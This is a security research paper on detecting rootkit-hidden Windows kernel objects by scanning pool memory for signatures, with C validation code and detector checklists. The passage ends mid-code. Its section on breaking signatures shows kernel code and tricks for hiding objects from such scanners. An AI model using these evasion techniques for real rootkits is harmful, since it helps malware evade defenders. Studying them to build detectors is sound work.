http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx;
accessed May 6, 2006.
[5] Microsoft Corporation. UnhandledExceptionFilter.
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/unhandledexceptionfilter.asp;
accessed May 6, 2006.
[6] Microsoft Corporation. SetUnhandledExceptionFilter.
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/setunhandledexceptionfilter.asp;
accessed May 6, 2006.
[7] Murphy, Matthew. Windows Media Player Plug-In Embed Overflow.
http://www.milw0rm.com/exploits/1505; accessed May
7, 2006.
[8] SkyLined. InternetExploiter.
http://www.edup.tudelft.nl/~bjwever/exploits/InternetExploiter2.zip;
accessed May 7, 2006.

uninformed/4.6.txt (1004 lines; diff suppressed because it is too large)

uninformed/4.7.txt (821 lines):
GREPEXEC: Grepping Executive Objects from Pool Memory
bugcheck
chris@bugcheck.org
1) Foreword
Abstract:
As rootkits continue to evolve and become more advanced, methods that can be
used to detect hidden objects must also evolve. For example, relying on system
provided APIs to enumerate maintained lists is no longer enough to provide
effective cross-view detection. To that point, scanning virtual memory for
object signatures has been shown to provide useful, but limited, results. The
following paper outlines the theory and practice behind scanning memory for
hidden objects. This method relies upon the ability to safely reference the
Windows system virtual address space and also depends upon building and
locating effective memory signatures. Using this method as a base, suggestions
are made as to what actions might be performed once objects are detected. The
paper also provides a simple example of how object-independent signatures can be
built and used to detect several different kernel objects on all versions of
Windows NT+. Due to time constraints, the source code associated with this
paper will be made publicly available in the near future.
Thanks:
Thanks to skape, Peter, and the rest of the uninformed hooligans;
you guys and gals rock!
Disclaimer:
The author is not responsible for how the paper's contents are used
or interpreted. Some information may be inaccurate or incorrect. If
the reader feels any information is incorrect or has not been
properly credited please contact the author so corrections can be
made. All content refers to the Windows XP Service Pack 2
platform unless otherwise noted.
2) Introduction
As rootkits become increasingly popular and more sophisticated than
ever before, detection methods must also evolve. While rootkit
technologies have evolved beyond API hooking methods, detectors have
also evolved beyond the hook detection ages. At first,
rootkits such as FU were detected by applications
such as Blacklight, using various methods
that exploited FU's weak, proof-of-concept design. These specific weaknesses were
addressed in FUTo. However, some weaknesses still remain, the
topic of this paper aside.
RAIDE, a rootkit detection tool, uses a memory
signature scanning method in order to find EPROCESS blocks hidden by
FUTo. This specific implementation works; however, it too has its
weaknesses. This paper attempts to outline the general concepts of
implementing a successful rootkit detection method using memory
signatures.
The following chapters will discuss how to safely enumerate system
memory, what to look for when building a memory signature, what to
do once a memory signature has been found, and potential methods of
breaking memory signatures. Finally, an accompanying tool will be used
to concretely illustrate the subject of this paper.
After reading the following paper, the reader should have an
understanding of the concepts and issues related to kernel object
detection using memory signatures. The author believes this to be an
acceptable method of rootkit detection. However, as with most things
in the security realm, no one technique is the ultimate solution and
this technique should only be considered complementary to other known
detection methods.
3) Scanning Memory
Enumerating arbitrary system memory is nowhere near an exact science, since
its state can change at any time while you are attempting to access
it. While this is true, the memory that surrounds kernel executive
objects should be fairly consistent. With proper care, memory accesses
should be safe and the chance of false positives and negatives should be
fairly minimal. The following sections will outline a safe method to
enumerate the contents of both the system's PagedPool and
NonPagedPool.
3.1) Retrieving Pool Ranges
For the purpose of enumerating pool memory it is unnecessary to
enumerate the entire system address space. The system maintains a
few global variables such as nt!MmPagedPoolStart,
nt!MmPagedPoolEnd and related NonPagedPool
variables that can be used in order to speed up a search and reduce
the possibility of unnecessary false positives. Although these
global variables are not exported, there are a couple of ways in which
they can be obtained.
The most reliable method on modern systems (Windows XP Service Pack 2
and up) is through the use of the KPCR->KdVersionBlock pointer located
at fs:[0x34]. This points to a KDDEBUGGER_DATA64 structure which is
defined in the Debugging Tools For Windows SDK header file wdbgexts.h.
This structure is commonly used by malicious software in order to gain
access to non-exported global variables to manipulate the system.
A second method to obtain PagedPool values is to reference the
per-session nt!_MM_SESSION_SPACE found at EPROCESS->Session. This contains
information about the session owning the process, including its ranges
and many other PagedPool related values shown here.
kd> dt nt!_MM_SESSION_SPACE
+0x01c NonPagedPoolBytes : Uint4B
+0x020 PagedPoolBytes : Uint4B
+0x024 NonPagedPoolAllocations : Uint4B
+0x028 PagedPoolAllocations : Uint4B
+0x044 PagedPoolMutex : _FAST_MUTEX
+0x064 PagedPoolStart : Ptr32 Void
+0x068 PagedPoolEnd : Ptr32 Void
+0x06c PagedPoolBasePde : Ptr32 _MMPTE
+0x070 PagedPoolInfo : _MM_PAGED_POOL_INFO
+0x244 PagedPool : _POOL_DESCRIPTOR
While enumerating the entire system address space is not preferable, it
can still be used in situations where pool information cannot be
obtained. The start of the system address space can be assumed to be
any address above nt!MmHighestUserAddress. However, it would appear
that an even safer assumption would be the address following the
LARGE_PAGE where ntoskrnl.exe and hal.dll are mapped. This can be
obtained by using any address exported by hal.dll and rounding up to the
nearest large page.
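The rounding described above is a one-line mask operation. The following is a minimal user-mode sketch, assuming x86 non-PAE 4MB large pages; the constant and function name are this example's own, not kernel symbols:

```c
#include <assert.h>
#include <stdint.h>

/* x86 non-PAE large pages are 4MB (2MB under PAE); this constant is an
   assumption of the example, not a kernel symbol. */
#define LARGE_PAGE_SIZE (4u * 1024 * 1024)

/* Round an address (e.g. any export from hal.dll) up to the next
   large-page boundary to approximate a scan start address. */
static uint32_t RoundUpToLargePage(uint32_t addr)
{
    return (addr + LARGE_PAGE_SIZE - 1) & ~(LARGE_PAGE_SIZE - 1);
}
```

For instance, an export at 0x806e2000 rounds up to 0x80800000, which then serves as the lower bound of the brute-force scan.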
3.2) Locking Memory
When accessing arbitrary memory locations, it is important that pages be
locked in memory prior to accessing them. This is done to ensure that
accessing the page can be done safely and will not cause an exception
due to a race condition, such as if it were to be de-allocated between a
check and a reference. The system provides a routine to lock pages
named nt!MmProbeAndLockPages. This routine can be used to lock either
pageable or non-paged memory. Since physical pages maintain a reference
count in the nt!MmPfnDatabase there is no worry of an outside source
unlocking the pages and having them page out to disk or become invalid.
In order to use MmProbeAndLockPages, a caller must first build an MDL
structure using something such as nt!IoAllocateMdl or
nt!MmInitializeMdl. The MDL creation routines are passed a virtual
address and length describing the block of virtual memory to be
referenced. On a successful call to nt!MmProbeAndLockPages, the virtual
address range described by the MDL structure is safe to access. Once the
block is no longer needed to be accessed, the pages must be unlocked
using nt!MmUnlockPages.
A trick can be used to further reduce the number of pages locked when
enumerating the NonPagedPool. As documented, MmProbeAndLockPages can be
called at DISPATCH_LEVEL with the limitation that it will only lock
resident memory pages, failing otherwise, which is a desirable
side-effect in this case.
4) Detecting Executive Objects
In general, all of the executive components of the NT kernel rely on the
object manager in order to manage the objects they allocate. All objects
allocated by the object manager have a common header named OBJECT_HEADER
and additional optional headers such as OBJECT_HEADER_NAME_INFO, process
quota information, and handle trace information. Let's take a look to
see what is common to all executive objects and how we can use the pool
block header information to identify an allocated executive object.
Lastly, some object specific information will be discussed in terms of
generating a useful memory signature for an object.
4.1) Generic Object Information
Since the OBJECT_HEADER is common to all objects, let's look at it in
detail. A static field here refers to all objects of specific type, not
all executive objects in the system.
kd> dt _OBJECT_HEADER
+0x000 PointerCount : Int4B
+0x004 HandleCount : Int4B
+0x004 NextToFree : Ptr32 Void
+0x008 Type : Ptr32 _OBJECT_TYPE
+0x00c NameInfoOffset : UChar
+0x00d HandleInfoOffset : UChar
+0x00e QuotaInfoOffset : UChar
+0x00f Flags : UChar
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : Ptr32 Void
+0x014 SecurityDescriptor : Ptr32 Void
+0x018 Body : _QUAD
-------------------+------------+-------------------------------------
PointerCount       | Variable   | Number of references
HandleCount        | Variable   | Number of open handles
NextToFree         | NotValid   | Used when freed
Type               | Static     | Pointer to OBJECT_TYPE
NameInfoOffset     | Static     | 0 or offset to related header
HandleInfoOffset   | Static     | 0 or offset to related header
QuotaInfoOffset    | Static     | 0 or offset to related header
Flags              | NotCertain | Not certain
ObjectCreateInfo   | Variable   | Pointer to OBJECT_CREATE_INFORMATION
QuotaBlockCharged  | NotCertain | Not certain
SecurityDescriptor | Variable   | Pointer to SECURITY_DESCRIPTOR
Body               | NotValid   | Union with the actual object
-------------------+------------+-------------------------------------
From this it is assumed that the most reliable and unique signature is
the Type field of the OBJECT_HEADER which could be used in order to
identify objects of a specific type such as EPROCESS, ETHREAD,
DRIVER_OBJECT, and DEVICE_OBJECT objects.
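Since the Body field sits at a fixed offset (0x18 in the 32-bit dump above), translating between an object pointer and its OBJECT_HEADER is simple pointer arithmetic. Here is a user-mode sketch of the usual OBJECT_TO_OBJECT_HEADER conversion; the structure is a simplified mirror of the dump above with pointer fields modeled as uint32_t so the offsets hold on any host, and is an assumption of the example rather than the kernel's definition:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified OBJECT_HEADER mirroring the 32-bit field offsets above;
   pointer fields are modeled as uint32_t for illustration. */
typedef struct _OBJECT_HEADER {
    int32_t  PointerCount;       /* +0x000 */
    int32_t  HandleCount;        /* +0x004, union with NextToFree */
    uint32_t Type;               /* +0x008, Ptr32 _OBJECT_TYPE */
    uint8_t  NameInfoOffset;     /* +0x00c */
    uint8_t  HandleInfoOffset;   /* +0x00d */
    uint8_t  QuotaInfoOffset;    /* +0x00e */
    uint8_t  Flags;              /* +0x00f */
    uint32_t ObjectCreateInfo;   /* +0x010 */
    uint32_t SecurityDescriptor; /* +0x014 */
    uint64_t Body;               /* +0x018, the object itself starts here */
} OBJECT_HEADER;

/* Equivalent of the kernel's OBJECT_TO_OBJECT_HEADER: back up from the
   object body to the header that precedes it. */
#define OBJECT_TO_OBJECT_HEADER(o) \
    ((OBJECT_HEADER *)((char *)(o) - offsetof(OBJECT_HEADER, Body)))

static OBJECT_HEADER g_example; /* instance for the sanity check below */
```

The same subtraction is what the scanner performs in reverse when it assumes a pool block contains an object and computes where the header's Type field should be.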
4.2) Validating Pool Block Information
Kernel pool management appears to be slightly different from usermode
heap management. However, if one assumes that the only concern is
dealing with pool memory allocations which are less than PAGE_SIZE, it is
fairly similar. Each call to ExAllocatePoolWithTag() returns a
pre-buffer header as follows:
kd> dt _POOL_HEADER
+0x000 PreviousSize : Pos 0, 9 Bits
+0x000 PoolIndex : Pos 9, 7 Bits
+0x002 BlockSize : Pos 0, 9 Bits
+0x002 PoolType : Pos 9, 7 Bits
+0x000 Ulong1 : Uint4B
+0x004 ProcessBilled : Ptr32 _EPROCESS
+0x004 PoolTag : Uint4B
+0x004 AllocatorBackTraceIndex : Uint2B
+0x006 PoolTagHash : Uint2B
For the purposes of locating objects, the following is a breakdown of
what could be useful. Again, static refers to fields common between similar
executive objects and not all allocated POOL_HEADER structures.
------------------------+------------+----------------------------------
PreviousSize | Variable | Offset to previous pool block
PoolIndex | NotCertain | Not certain
BlockSize | Static | Size of pool block
PoolType | Static | POOL_TYPE
Ulong1 | Union | Padding, not valid
ProcessBilled | Variable | Allocator EPROCESS when no Tag specified
PoolTag | Static | Pool Tag (ULONG)
AllocatorBackTraceIndex | NotCertain | Not certain
PoolTagHash | NotCertain | Not certain
------------------------+------------+----------------------------------
The POOL_HEADER contains several fields that appear to be common to similar
objects which could be used to further verify the likelihood of
locating an object of a specific type such as BlockSize, PoolType, and
PoolTag.
In addition to the mentioned static fields, two other fields,
PreviousSize and BlockSize, can be used to validate that the currently
assumed POOL_HEADER appears to be a valid, allocated pool block and is in
one of the pool manager's maintained linked lists. PreviousSize and
BlockSize are multiples of the minimum pool alignment, which is 8 bytes
on a 32-bit system and 16 bytes on a 64-bit system. These two fields
supply the offsets to the neighboring pool blocks, expressed in units of
that minimum alignment.
If PreviousSize equals 0, the current POOL_HEADER should be the first
pool block in the pool's contiguous allocations. If it is not, it
should equal the previous POOL_HEADER's BlockSize. BlockSize should
never equal 0 and should always equal the following POOL_HEADER's
PreviousSize.
The following code validates a POOL_HEADER of an allocated pool block.
//
// Assumes BlockOffset < PAGE_SIZE
// Checks both neighbors: the previous block's BlockSize must match our
// PreviousSize, and the next block's PreviousSize must match our BlockSize
//
BOOLEAN ValidatePoolBlock (
    IN PPOOL_HEADER  pPoolHdr,
    IN VALIDATE_ADDR pValidator
    )
{
    BOOLEAN bReturn = FALSE;
    PPOOL_HEADER pPrev;
    PPOOL_HEADER pNext;

    // PreviousSize and BlockSize are in units of sizeof(POOL_HEADER)
    pPrev = (PPOOL_HEADER)((PUCHAR)pPoolHdr
          - (pPoolHdr->PreviousSize * sizeof(POOL_HEADER)));
    pNext = (PPOOL_HEADER)((PUCHAR)pPoolHdr
          + (pPoolHdr->BlockSize * sizeof(POOL_HEADER)));

    if
    ((
          ( pPoolHdr != pNext )                    // BlockSize must not be 0
        &&( pValidator( (PUCHAR)pNext + sizeof(POOL_HEADER) - 1 )
        &&  pPoolHdr->BlockSize == pNext->PreviousSize )
     )
     &&
     (
          ( pPoolHdr == pPrev )                    // PreviousSize == 0: first block
        ||( pValidator( pPrev )
        &&  pPoolHdr->PreviousSize == pPrev->BlockSize )
     ))
    {
        bReturn = TRUE;
    }
    return bReturn;
}
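To see the neighbor checks in action, here is a user-mode sketch that fabricates three adjacent blocks and applies the same PreviousSize/BlockSize consistency rules. The POOL_HEADER layout is the 32-bit one from the dump above; all function names are the example's own, and the address validator is omitted since the whole fake page is addressable:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* 8-byte POOL_HEADER, 32-bit layout: sizes are in 8-byte units. */
typedef struct _POOL_HEADER {
    uint16_t PreviousSize : 9;
    uint16_t PoolIndex    : 7;
    uint16_t BlockSize    : 9;
    uint16_t PoolType     : 7;
    uint32_t PoolTag;
} POOL_HEADER;

/* The same neighbor-consistency rules as ValidatePoolBlock, minus the
   address validator since this fake page is fully addressable. */
static int CheckBlock(const POOL_HEADER *hdr)
{
    const POOL_HEADER *prev = hdr - hdr->PreviousSize;
    const POOL_HEADER *next = hdr + hdr->BlockSize;

    if (hdr->BlockSize == 0)
        return 0; /* BlockSize may never be 0 */
    if (hdr->PreviousSize != 0 && prev->BlockSize != hdr->PreviousSize)
        return 0; /* disagreement with the previous block */
    if (next->PreviousSize != hdr->BlockSize)
        return 0; /* disagreement with the following block */
    return 1;
}

/* Fabricate a page fragment: valid blocks of 2 and 3 units, then a
   deliberately corrupt tail block with BlockSize == 0. */
static POOL_HEADER *MakePage(void)
{
    static POOL_HEADER page[7];
    memset(page, 0, sizeof(page));
    page[0].PreviousSize = 0; page[0].BlockSize = 2;
    page[2].PreviousSize = 2; page[2].BlockSize = 3;
    page[5].PreviousSize = 3; page[5].BlockSize = 0;
    return page;
}
```

The first two blocks pass because each neighbor agrees with them; the tail block fails immediately on its zero BlockSize.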
4.3) Object Specific Signatures
So far a few useful signatures have been shown which apply to all
executive objects and could be used to identify them in memory. For some
cases these may be enough to be effective. However, in other cases, it
may be necessary to examine information within the object's body itself
in order to identify them. It should be noted that some objects of
interest may be clearly defined and documented while others may not be.
Furthermore, executive object definitions may vary between OS versions.
The following subsections briefly outline obvious memory signatures for
a few objects which generally are of interest when identifying
rootkit-like behavior. A few examples of object-specific signatures
will also be discussed, some of which have been used in previous work.
4.3.1) Process Objects
Here are just a few of the most basic EPROCESS fields which can form a
simple signature using rather predictable constant values which hold
true for all EPROCESS structures in the same system.
-----------------------------+------------------------------------------
Pcb.Header.Type              | Dispatcher header type number
Pcb.Header.Size              | Size of the dispatcher object
Pcb.Affinity                 | Bit mask of the CPUs in the system
Pcb.BasePriority             | Typically the default of 8
Pcb.ThreadQuantum            | Typically 18 on workstations
ExitTime                     | 0 for running processes
UniqueProcessId              | 0 when bitwise ANDed with 0xFFFF0002
SectionBaseAddress           | Typically 0x00400000 for non-system executables
InheritedFromUniqueProcessId | Same form as UniqueProcessId, typically a valid running PID
Session                      | Unique on a per-session basis
ImageFileName                | Printable ASCII, typically ending in '.exe'
Peb                          | 0x7FF00000 when bitwise ANDed with 0xFFF00FFF
SubSystemVersion             | 0x400 on XP Service Pack 2
-----------------------------+------------------------------------------
Note that there are several other DISPATCHER_HEADERs embedded within
locks, events, timers, etc. in the structure, which also have a
predictable Header.Type and Header.Size.
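Two of the mask tests above can be expressed directly in code. A small sketch under the paper's 32-bit XP SP2 assumptions; the function names are the example's own:

```c
#include <assert.h>
#include <stdint.h>

/* The Peb signature from the table: user-mode PEB addresses look like
   0x7FFxy000, so masking out the variable middle bits leaves 0x7FF00000. */
static int LooksLikePeb(uint32_t peb)
{
    return (peb & 0xFFF00FFF) == 0x7FF00000;
}

/* The UniqueProcessId signature: PIDs fit in 16 bits and are multiples
   of 4 (so bit 1 is clear), hence ANDing with 0xFFFF0002 must give 0. */
static int LooksLikePid(uint32_t pid)
{
    return (pid & 0xFFFF0002) == 0;
}
```

A scanner would AND several such cheap tests together so that a block must satisfy all of them before being reported as a candidate EPROCESS.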
4.3.2) Thread Objects
Here are just a few of the most basic ETHREAD fields which can form a
simple signature using rather predictable constant values which hold
true for all ETHREAD structures in the same system.
------------------+------------------------------------------------------
Tcb.Header.Type   | Dispatcher header type number
Tcb.Header.Size   | Size of the dispatcher object
Teb               | 0x7FF00000 when bitwise ANDed with 0xFFF00FFF
BasePriority      | Typically the default of 8
ServiceTable      | nt!KeServiceDescriptorTable(Shadow), used by RAIDE
Affinity          | Bit mask of the CPUs in the system
PreviousMode      | 0 or 1 (KernelMode or UserMode)
Cid.UniqueProcess | 0 when bitwise ANDed with 0xFFFF0002
Cid.UniqueThread  | 0 when bitwise ANDed with 0xFFFF0002
------------------+------------------------------------------------------
Note that there are several other DISPATCHER_HEADERs embedded within
locks, events, timers, etc. in the structure, which also have a
predictable Header.Type and Header.Size.
4.3.3) Driver Objects
A tool written previously named MODGREPPER by Joanna Rutkowska of
invisiblethings.org used a signature-based approach to detect hidden
DRIVER_OBJECTs. This signature was later 'broken' by valerino, as described
in a rootkit.com article titled "Please don't greap me!". Listed here
are a few fields which a signature could be built upon to detect
DRIVER_OBJECTs.
--------------+-----------------------------------------------------------
Type | I/O Subsystem structure type ID, should be 4
Size | Size of the structure, should be 0x168
DeviceObject | Pointer to a valid first created device object(can be NULL)
DriverSection | Pointer to a nt!_LDR_DATA_TABLE_ENTRY structure
DriverName | A UNICODE_STRING structure containing the driver name
--------------+-----------------------------------------------------------
The following fields of the DRIVER_OBJECT can be validated by assuring
they fall within the range of a loaded driver image such that:
DriverStart < FIELD < DriverStart + DriverSize.
--------------------+----------------------------------------------------
DriverInit | Address of DriverEntry() function
DriverUnload | Address of DriverUnload() function, can be NULL
MajorFunction[0x1c] | Dispatch handlers for IRP_MJ_XXX, can default to ntoskrnl.exe
--------------------+----------------------------------------------------
4.3.4) Device Objects
For the DEVICE_OBJECT structure there are few static
signatures which are usable. Here are the only obvious ones.
-------------+----------------------------------------------------------
Type | I/O Subsystem structure type ID, should be 3
Size | Size of the structure, should be 0xb8
DriverObject | Pointer to a valid driver object
-------------+----------------------------------------------------------
Note that the DriverObject field must be valid in order for the device
to function.
4.3.5) Miscellaneous
So far the memory signatures discussed have been fairly straightforward
and for the most part are simply a binary comparison with a specific
value. Later in this paper, a technique called N-depth pointer
validation will be discussed as a method of developing a more effective
signature for situations where an attacker attempts to evade
pointer-based memory signatures.
Another way of considering an object field as a signature is to validate
it in terms of its characteristics instead of by its value. A common
example of this would be to validate an object field LIST_ENTRY.
Validating a LIST_ENTRY structure can be done as follows:
Entry == Entry->Flink->Blink == Entry->Blink->Flink.
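That characteristic check is short enough to sketch directly; a user-mode version with types and names local to the example:

```c
#include <assert.h>
#include <stddef.h>

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* The characteristic check from the text:
   Entry == Entry->Flink->Blink == Entry->Blink->Flink */
static int ValidateListEntry(const LIST_ENTRY *e)
{
    return e->Flink != NULL && e->Blink != NULL
        && e->Flink->Blink == e && e->Blink->Flink == e;
}

static LIST_ENTRY a, b;

/* Build a well-formed two-node circular list and validate both nodes. */
static int DemoValid(void)
{
    a.Flink = &b; a.Blink = &b;
    b.Flink = &a; b.Blink = &a;
    return ValidateListEntry(&a) && ValidateListEntry(&b);
}

/* Corrupt one link; the check on the other node now fails. */
static int DemoBroken(void)
{
    DemoValid();
    a.Flink = &a;
    return ValidateListEntry(&b);
}
```

In kernel memory, each pointer dereference in the check would of course first pass through the address validator described in section 3.2.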
A pointer to any object or memory allocation can also be checked using
the function shown previously, named ValidatePoolBlock. Even a
UNICODE_STRING.Buffer can be validated this way provided the allocation
is less than PAGE_SIZE.
5) Found An Object, Now What?
The question of what to do after potentially identifying an executive
object through a signature depends on what the underlying goal is. For
the purpose of the sample utility included with this paper, the goal
is simply to display some information about the objects as they are
found.
In the context of a rootkit detector, however, there may be many more
steps that need to be taken. For example, consider a detector looking
for EPROCESS blocks which have been unlinked from the process linked
list or a driver module hidden from the system service API. In order to
determine this, some cross-view comparisons of the raw objects detected
and the output from an API call or a list enumeration is needed.
Detectors must also take into consideration the race condition of an
object being created or destroyed in between the memory enumeration and
the acquisition of the "known to the system" data.
Additionally, it may be desired that some additional sanity checks be
performed on these objects in addition to the signature. Do the object
fields x, y, and z contain valid pointers? Is field c equal to b? Does
the object appear valid but show signs of tampering intended to hide
it? Does the number of detected objects match up with a global count
value such as the one maintained in an OBJECT_TYPE structure? The
following sections briefly mention some thoughts on what to do with a
suspected object of the four types discussed in Chapter 4.
5.1) Process Objects
Here is a brief list of things to check when scanning for EPROCESS
objects.
1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
2. Compare against a system call such as nt!NtQuerySystemInformation.
3. Compare against the EPROCESS->ActiveProcessLinks list.
4. Does the process have a valid list of threads?
5. Can PsLookupProcessByProcessId open its UniqueProcessId?
6. Is ImageFileName a valid string? Zeroed? Garbage?
5.2) Thread Objects
Here is a brief list of things to check when scanning for ETHREAD
objects.
1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
2. Compare against a system call such as nt!NtQuerySystemInformation.
3. Does the process have a valid owning process?
4. Can PsLookupThreadByThreadId open its Cid.UniqueThread?
5. What does Win32StartAddress point to? Is it a valid module address?
6. What is its ServiceTable value?
7. If it is in a wait state, for how long?
8. Where is its stack? What does its stack trace look like?
5.3) Driver Objects
Here is a brief list of things to check when scanning for DRIVER_OBJECT
objects.
1. Compare against services found in the service control manager database.
2. Compare against a system call such as nt!NtQuerySystemInformation.
3. Is the object in the global system namespace?
4. Does the driver own any valid device objects?
5. Does the driver base address point to a valid MZ header?
6. Do the object's function pointer fields look correct?
7. Does DriverSection point to a valid nt!_LDR_DATA_TABLE_ENTRY?
8. Does DriverName or the LDR_DATA_TABLE_ENTRY contain valid strings?
   Zeroed? Garbage?
5.4) Device Objects
Here is a brief list of things to check when scanning for DEVICE_OBJECT
objects.
1. Is the owning driver object valid?
2. Is the device named and is it mapped into the global namespace?
3. Does it appear to be in a valid device stack?
4. Are its Type and Size fields correct?
6) Breaking Signatures
Memory signatures can be an effective method of identifying allocated
objects and can serve as a low level baseline in order to detect objects
hidden by several different methods. Although the memory signature
detection method may be effective, it doesn't come without its own set
of problems. Many signatures can be evaded using several different
techniques and non-evadable signatures for objects, if any exist, have
yet to be explored. The following sections discuss issues and counter
measures related to defeating memory signatures.
6.1) Pointer Based Signatures
Using a memory signature which is a valid pointer to some common object
or static data is a very appealing signature to use for detection due to
its reliability; however, it is also an easy signature to bypass. The
following demonstrates the most simplistic method of bypassing the
OBJECT_HEADER->Type signature this paper uses as a generic object memory
signature. This is possible because the OBJECT_TYPE is just an allocated
structure of fairly stable data. Many pointer based signatures with
similar static characteristics are open to the same attack.
NTSTATUS KillObjectTypeSignature (
    IN PVOID Object
    )
{
    PVOID pDummyObject;
    POBJECT_HEADER pHdr;

    pHdr = OBJECT_TO_OBJECT_HEADER( Object );

    // Duplicate the OBJECT_TYPE and repoint the header at the copy
    pDummyObject = ExAllocatePool( NonPagedPool, sizeof(OBJECT_TYPE) );
    RtlCopyMemory( pDummyObject, pHdr->Type, sizeof(OBJECT_TYPE) );
    pHdr->Type = pDummyObject;

    return STATUS_SUCCESS;
}
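The effect of this relocation on a naive detector can be demonstrated in user mode. In the sketch below, all types and names are the example's own: after the copy, a pointer comparison against the known type address fails while a content comparison still matches, which is exactly why the pointer alone is a fragile signature:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* A stand-in for OBJECT_TYPE: some stable, recognizable data. */
typedef struct _FAKE_TYPE {
    uint32_t Key;
    uint32_t Flags;
} FAKE_TYPE;

static FAKE_TYPE RealType = { 0x546A624F, 0 };
static FAKE_TYPE Clone;

/* The relocation attack: duplicate the type object and hand back a
   pointer to the copy, as KillObjectTypeSignature does in the kernel. */
static FAKE_TYPE *RelocateType(void)
{
    memcpy(&Clone, &RealType, sizeof(Clone));
    return &Clone;
}
```

A detector that only compares the Type pointer against a known address misses the clone; one that also inspects the pointed-to contents, as the N-depth approach below does, still has something to work with.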
6.2) N-Depth Pointer Validation
As demonstrated in the previous section, pointer based signatures are
effective. However, in some cases, they may be trivial to bypass. The
following code demonstrates an example which does what this paper refers
to as N-depth pointer validation in an attempt to create a more complex,
and potentially more difficult to bypass, signature using pointers. The
following example is also evadable using the same principle of
relocation shown above.
The algorithm assumes a given address is an executive object and
attempts validation by performing the following steps:
1. Calculates an assumed OBJECT_HEADER
2. Assumes pObjectHeader->Type is an OBJECT_TYPE
3. Calculates an assumed OBJECT_HEADER for the OBJECT_TYPE
4. Assumes pObjectHeader->Type is nt!ObpTypeObjectType
5. Validates pTypeObject->TypeInfo.DeleteProcedure == nt!ObpDeleteObjectType
BOOLEAN ValidateNDepthPtrSignature (
IN PVOID Address,
IN VALIDATE_ADDR pValidate
)
{
PVOID pObject;
POBJECT_TYPE pTypeObject;
POBJECT_HEADER pHdr;
pHdr = OBJECT_TO_OBJECT_HEADER( Address );
if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;
// Assume this is the OBJECT_TYPE for this assumed object
pTypeObject = pHdr->Type;
// OBJECT_TYPE's have headers too
pHdr = OBJECT_TO_OBJECT_HEADER( pTypeObject );
if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;
// OBJECT_TYPE's have an OBJECT_TYPE of nt!ObpTypeObjectType
pTypeObject = pHdr->Type;
if( ! pValidate(&pTypeObject->TypeInfo.DeleteProcedure) ) return FALSE;
// \ObjectTypes\Type has a DeleteProcedure of nt!ObpDeleteObjectType
if( pTypeObject->TypeInfo.DeleteProcedure
!= nt!ObpDeleteObjectType ) return FALSE;
return TRUE;
}
6.3) Miscellaneous
An obvious method of preventing detection from memory scanning would be
to use what is commonly referred to as the Shadow Walker memory
subversion technique. If virtual memory is unable to be read then of
course a memory scan will skip over this area of memory. In the context
of pool memory, however, this may not be an easy attack since it may
create a situation where the pool appears corrupted which could lead to
crashes or system bugchecks. Of course, attacking a function like
nt!MmProbeAndLockPages or IoAllocateMdl globally or specifically in the
import address table of the detector itself would work.
For memory signatures based on constant or predictable values, it may be
feasible to either zero out or change these fields without disturbing
system operation. For example, take the author's enhancements to the FUTo
rootkit, where it is seen that EPROCESS->UniqueProcessId can be safely
cleared to 0, or the previously mentioned rootkit.com article titled
"Please don't greap me!", which clears DRIVER_OBJECT->DriverName and its
associated buffer in order to defeat MODGREPPER.
For the case of some pointer signatures a simple binary comparison may
not be enough to validate it. Take the above example using
nt!ObpDeleteObjectType: it could be defeated by overwriting
pTypeObject->TypeInfo.DeleteProcedure to point to a simple jump
trampoline, allocated elsewhere, which jumps straight back to
nt!ObpDeleteObjectType.
7) GrepExec: The Tool
Included with this paper is a proof-of-concept tool, complete with
source, which demonstrates scanning the pool for signatures to detect
executive objects. The objects detected are DRIVER_OBJECT, DEVICE_OBJECT,
EPROCESS, and ETHREAD. The tool makes no attempt to determine whether an
object has been hidden in any way. Instead, it simply displays found
objects on standard output. At this time the author has no plans to
continue work with this specific tool, however, there are plans to
integrate the memory scanning technique into another project. The source
code for the tool can be easily modified to detect other signatures
and/or other objects.
7.1) The Signature
For demonstration purposes the signature used is simple. All objects are
allocated in NonPagedPool so only non-paged memory is enumerated for the
search. The signature is detected as follows:
1. Enumeration is performed by assuming the start of a pool block.
2. The signature offset is added to this pointer.
3. The assumed signature is compared with the OBJECT_HEADER->Type
for the object type being searched for.
4. The assumed POOL_HEADER->PoolType is compared to the objects known
pool type.
5. The assumed POOL_HEADER is validated using the function from
   section 4.2, ValidatePoolBlock.
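Steps 1 through 5 amount to hopping from header to header by BlockSize and doing a fixed-offset compare at each stop. A user-mode sketch of that walk on a fabricated page follows; little-endian layout is assumed (as on x86), and the signature value and all names are the example's own:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define UNIT 8 /* minimum pool alignment on a 32-bit system */

/* Walk the page block by block: the 9 low bits of the word at header
   offset +2 are BlockSize, in UNITs. Count blocks whose 32-bit word at
   sigOffset (from the header) equals the signature. */
static int ScanPage(const uint8_t *page, size_t len,
                    size_t sigOffset, uint32_t signature)
{
    int hits = 0;
    size_t pos = 0;

    while (pos + UNIT <= len) {
        uint16_t sizes;
        uint32_t blockSize;
        uint32_t value;

        memcpy(&sizes, page + pos + 2, sizeof(sizes));
        blockSize = sizes & 0x1FF;
        if (blockSize == 0)
            break; /* corrupt header or end of allocations */
        if (pos + sigOffset + sizeof(value) <= len) {
            memcpy(&value, page + pos + sigOffset, sizeof(value));
            if (value == signature)
                hits++;
        }
        pos += (size_t)blockSize * UNIT;
    }
    return hits;
}

/* Fabricate a page: a 2-unit block, then a 3-unit block carrying a
   made-up signature 8 bytes into it. */
static uint8_t *MakeScanPage(void)
{
    static uint8_t page[40];
    uint32_t sig = 0xB00C0DE5u;

    memset(page, 0, sizeof(page));
    page[2] = 2;                          /* block 0: BlockSize = 2 units */
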